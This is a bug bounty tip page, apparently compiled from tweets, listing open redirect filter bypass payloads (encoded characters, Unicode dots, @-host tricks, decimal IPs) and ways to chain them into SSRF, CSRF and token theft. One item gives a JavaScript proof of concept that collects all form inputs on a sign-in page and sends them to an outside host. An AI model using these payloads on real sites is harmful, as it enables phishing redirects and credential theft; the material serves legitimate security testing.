# Open Redirect

* [file.php?url=/admin/ Redirects to: http://website.com/admin/ Put URL file.php?url=@google.com Now it is website.com@google.com which redirects to http://google.com!](https://twitter.com/LooseSecurity/status/1164579967184887809)
* [#bugbountytip Got an Open Redirect like this before. Website redirected to its own URL with input appended to it. Input @mywebsite.com and alter conf of your site to not prompt for login. URL: victim.com@mywebsite.com (browser thinks http://victim.com  is user). #BugBounty](https://twitter.com/LooseSecurity/status/1078630347464679424)
* [in some cases you can have an Open Redirect using %0d%0a and two "/" directly on the main url: http://victim//%0d%0ahttp://google.com/](https://twitter.com/k33r0k/status/1081589568405671936)
* [#bugbounty #bugbountytip Try to change protocol to bypass open redirect protection. http://example.com  -> ftp://example.com You might be lucky.](https://twitter.com/neeraj_sonaniya/status/1086911248845828101)
* [http:sitetoredirect , http%3asitetoredirect , http%253asitetoredirect](https://twitter.com/h1_kenan/status/1117084793852846080)

  [mostly works, for open redirect vulnerabilities.](https://twitter.com/h1_kenan/status/1117084793852846080)
* [Hold onto your open redirects. If you ever encounter SSRF then you can bypass same-origin filters using an open redirect. If they're just blocking localhost though, then create a redirect on your own website. #SSRF #infosec #CyberSecurity](https://twitter.com/LooseSecurity/status/1114317490157494272)
* [Bug Bounty Tip: Always check the content of a Redirection Page (302/301). especially if it requires authentification. And remember a Redirection Page is a good place to test issues like CRLF injection and Open Redirection.](https://twitter.com/sandh0t/status/1008636721163067393)
* [For open redirects, try using this character: 。The website thinks it's redirecting to a page on the site, but browsers convert it to a '.' thus completing the redirect. Usage: ?url=//google。com Goes to: https://google.com URL encoded: %E3%80%82](https://twitter.com/LooseSecurity/status/1179149212874952704)
* ["/%0d/domain\_address" is one of the best bypass in account takeover stealing tokens.](https://twitter.com/kunalp94/status/1195321932612169728)
* <https://twitter.com/pdeomare/status/1205402391526486017>
* [Found an interesting open redirect bypass today. Target would only allow \*.target.com, but if you entered hxxp://evil.com%EF%BC%http://A1.target.com, the backed would return hxxp://evil.com/?.target.com :D #bugbounty #unicode](https://twitter.com/dubs3c/status/1222273089418878976)
* [Bug bounty advice: If you have a GET request where developers added referer-based CSRF protection, use an on-site Open Redirect for this URL to get a whitelisted website in the Referer header. In the case when you have a POST request, try to change a method to GET.](https://twitter.com/0xw2w/status/1248688218326863872)
* [Open Redirect Through HTTP Pollution Attack.](https://twitter.com/darklotuskdb/status/1260837629718740992)

  [URL -> sub.dom-co/go/https/dom-co](https://twitter.com/darklotuskdb/status/1260837629718740992)

  [1) sub.dom-co/go/https/dom-co.evil-co/ -> 404](https://twitter.com/darklotuskdb/status/1260837629718740992)

  [2) sub.dom-co/go/https/dom-co/go/https/dom-co.evil-co/ -> Redirected To Evil website](https://twitter.com/darklotuskdb/status/1260837629718740992)
* [#BugBounty #bugbountytip #infosec For Open Redirects you can bypass a lot of WAF using a special character which a lot of browsers (such as FireFox) convert into a '.' which will complete your URL.\
  \
  The character is: 。\
  Usage: redirecthere。com#CyberSecurity](https://twitter.com/LooseSecurity/status/1074705120804376576)

![](https://1889062997-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-LbWrDBBrbM1WtGeIKRO%2F-M7fCtdyZbUEhVduz58O%2F-M7g6EX6DGXjnb7vvpqH%2Fimage.png?alt=media\&token=fe5fbe62-3b79-4c5a-84e7-1ced09c12997)

* When you find XSS over open redirect on sign-in/up pages, just capture the credentials and hijack them PoC: javascript:inpts=document.querySelectorAll('input');info='';for(i=0;i\<inpts.length;i++){info+=','+inputs\[i].value};location.href='<https://xhze.em/?'+info>
* Open Redirect Bypass: /path?redirect=//2130706433 or /path?redirect=//0x7f000001 It will redirect you to 127.0.0.1 Thank you for tip[@llt4l](https://twitter.com/llt4l) and[@dhyaniji](https://twitter.com/dhyaniji7)
* There are many DM people with me about this bug. As a result, I have consolidated all my processed "Open redirects" reports this month.

  Payloads bypass most filters:

  http:http:evil\[.]com http\:/evil%252ecom ///[www.x.com@evil.com](http://www.x.com@evil.com)
* when you are looking for bugs like SSRF & Open Redirect. and there is a blacklisted character. try to bypassed using other Unicode characters. I found Open Redirect Bypass Using (。) Chinese dot "%E3%80%82". poc: redirect\_to=////evil%E3%80%82com [#BugBounty](https://twitter.com/hashtag/BugBounty?src=hashtag_click) [#bugbountytip](https://twitter.com/hashtag/bugbountytip?src=hashtag_click)

**Blogs:**

{% embed url="<https://elmahdi.tistory.com/4>" %}